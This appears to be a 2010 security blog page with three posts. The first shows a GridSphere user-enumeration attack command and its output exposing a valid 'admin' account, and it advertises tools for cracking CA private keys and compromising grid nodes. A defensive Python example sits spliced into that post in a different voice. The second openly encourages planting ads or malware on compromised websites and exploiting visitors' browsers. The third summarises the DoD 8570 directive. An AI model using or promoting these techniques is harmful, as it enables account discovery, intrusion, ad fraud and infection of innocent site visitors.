20 Jun 2010

GridSphere Remote User Enumeration

By IPSECS Admin. Posted in Exploitation, News

GridSphere is a web-based portal framework for accessing grid computing resources. It provides an open-source, portlet-based web portal and enables developers to quickly develop and package third-party portlet web applications that can be run and administered within the GridSphere portlet container.

GridSphere, which is critical for accessing grid resources, is vulnerable to user enumeration: it can be exploited to determine whether a user is valid in the grid. The vulnerability exists because of how GridSphere handles a nonexistent user: it responds with “User does not exist”. To exploit this issue, you can use this Python script.

python gridsphere-brute.py https://example.com/acgt/portal?cid=login users.txt

[INVALID] anto
[INVALID] abc
[INVALID] betha
[INVALID] een
[INVALID] nita
[INVALID] aris
[INVALID] atik
[INVALID] babas
[INVALID] alex
[OK] admin
[INVALID] fuck
[INVALID] lisa
[INVALID] ifa
[INVALID] hana
[INVALID] bram
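The fix for the behaviour shown above is to answer every failed login identically. The following is an added example, not GridSphere code and not the IPSECS script: it models the distinct "User does not exist" response next to a hardened handler, plus a regression check. The user store, function names and the "Incorrect password" message are assumptions made for illustration.

```python
import hashlib
import hmac
import os

def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 10_000)

def _make_user(password):
    salt = os.urandom(16)
    return salt, _hash(password, salt)

# Constructed sample user store (assumption, not GridSphere's real schema).
USERS = {"admin": _make_user("correct horse")}
# Dummy record checked when the name is unknown, so both paths do the same work.
_DUMMY = _make_user("placeholder")

GENERIC_ERROR = "Invalid user name or password"

def login_vulnerable(user, password):
    """Models the flaw: unknown users get their own, distinct message."""
    if user not in USERS:
        return "User does not exist"
    salt, stored = USERS[user]
    if not hmac.compare_digest(_hash(password, salt), stored):
        return "Incorrect password"  # assumed wording for the other failure
    return "OK"

def login_hardened(user, password):
    """Same message and same hashing cost whether or not the user exists."""
    salt, stored = USERS.get(user, _DUMMY)
    ok = hmac.compare_digest(_hash(password, salt), stored)
    if ok and user in USERS:
        return "OK"
    return GENERIC_ERROR

def leaks_user_existence(login, known_user, unknown_user):
    """Regression check: True if failed logins differ for known vs unknown names."""
    wrong = "definitely-not-the-password"
    return login(known_user, wrong) != login(unknown_user, wrong)

if __name__ == "__main__":
    print("vulnerable leaks:", leaks_user_existence(login_vulnerable, "admin", "anto"))
    print("hardened leaks:  ", leaks_user_existence(login_hardened, "admin", "anto"))
```

A check like `leaks_user_existence` belongs in the portal's test suite so the distinct message cannot be reintroduced; rate limiting failed logins per source is a separate control that complements it.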

Years ago, IPSECS developed some tools to assess grid computing security, which can be downloaded here. The tools are encoded in ASCII and bundled with an article, written in Indonesian, that explains grid computing [in]security. The tools can be used to:

  • Enumerate headnodes by identifying the GridFTP Service and Web Service Container
  • Crack the private key of a Certificate Authority
  • Exploit other headnodes in the grid when a headnode and its certificate are compromised.

For your information, IPSECS is currently developing grid-toolkit to make grid computing penetration much easier.

 

20 Jun 2010

How to Cheat The Ads for Profit!

By IPSECS Admin. Posted in SEO and Ads

Have you ever thought of putting your ads on a compromised website? Have you ever replaced someone's ads with your own? Putting your ads on someone's website will not help increase your revenue if it is a low-traffic website.

Have you ever thought of inserting malware into a compromised website and exploiting its clients? Yeah, browser vulnerabilities are the answer! Inserting it into a low-traffic website will not really help spread your malware and compromise its clients!

Now, even though this is old for us (IPSECS), we are releasing a tool to identify traffic rank based on Alexa. This tool will help you identify the Alexa Rank of a massive collection of domains. By knowing the traffic rank of domains, you can decide whether a website is worth putting your ads on and whether it has the potential to boost your revenue. Our simple tool needs some Perl modules to be installed:

  • strict
  • warnings
  • Switch
  • POSIX
  • LWP::UserAgent
  • HTTP::Message

Lastly, you can download our tool to help identify traffic here. Cheat the ads for your profit, boost your revenue now!

 

19 Jun 2010

DoD 8570 Directive

By IPSECS Admin. Posted in Management

The Department of Defense (DoD) is currently undergoing an organizational process involving Information Assurance (IA) standardization.

DoD 8570 seeks to accomplish the following objectives:

1. Create standards whereby IA Workforce personnel, at all levels and functions, obtain a uniform level of competency with regard to DoD information and networks.
2. Establish a minimum skill level for all IA Workforce personnel throughout the DoD.
3. Provide qualified IA Workforce members to the soldiers that need them.
4. Create a set of formal training requirements and establish certification programs.
5. Add to the knowledge base of every IA Workforce team member through education or experience.

The DoD 8570 document can be found here, while DoD 8570 training and assessment can be reached at GIAC/DoD8750.

This article is ripped and modified from http://dod8570.net/